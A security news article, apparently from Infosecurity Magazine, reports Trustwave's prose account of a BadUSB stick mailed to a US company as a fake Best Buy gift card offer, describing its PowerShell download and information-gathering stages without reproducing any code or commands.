BadUSB Stick Mailed to Company From ‘Best Buy’

Written by

Security experts have intercepted a highly targeted attack in which a malicious USB device was mailed out to a US company.

Trustwave was alerted to the attempted attack on one of its customers’ partners, after they were sent an unsolicited letter in the post purporting to come from Best Buy.

A brief message thanked the company for being a loyal customer and enclosed a ‘$50 gift card’ alongside the USB, which the sender claimed contained a list of the items the gift balance could be spent on.

In fact, the device was a “BadUSB,” in other words, its firmware had been overwritten to automatically inject malicious commands once connected to a PC.

On analysis, Trustwave discovered a PowerShell payload designed to download second stage PowerShell code from the internet, which in turn installed malicious JavaScript.

“The JScript code could be anything, but when we decoded it, it reveals a code that gathers system information from the infected host,” the vendor explained.

Information including username, hostname, domain name, computer model, running processes, Office and Adobe Acrobat installations and OS info are encoded and sent back to the C&C server.

“The main Jscript code [then] enters an infinite loop sleeping for two minutes in each loop iteration then getting a new command from the command and control,” said Trustwave.

It’s unclear what the end goal was for these attackers, but a USB attack of this kind, whilst used by pen testers, is rare to see used in anger, the vendor concluded.

“These types of USB devices are widely known and used by security professionals. The fact that they are also cheap and readily available to anyone meant that it was just a matter of time to see this technique used by criminals in the wild,” it explained.

“Since USB devices are ubiquitous, used and seen everywhere, some consider them innocuous and safe. Others can be very curious about the contents of an unknown USB device. If this story teaches us anything, it's that one should never trust such a device.”

What’s hot on Infosecurity Magazine?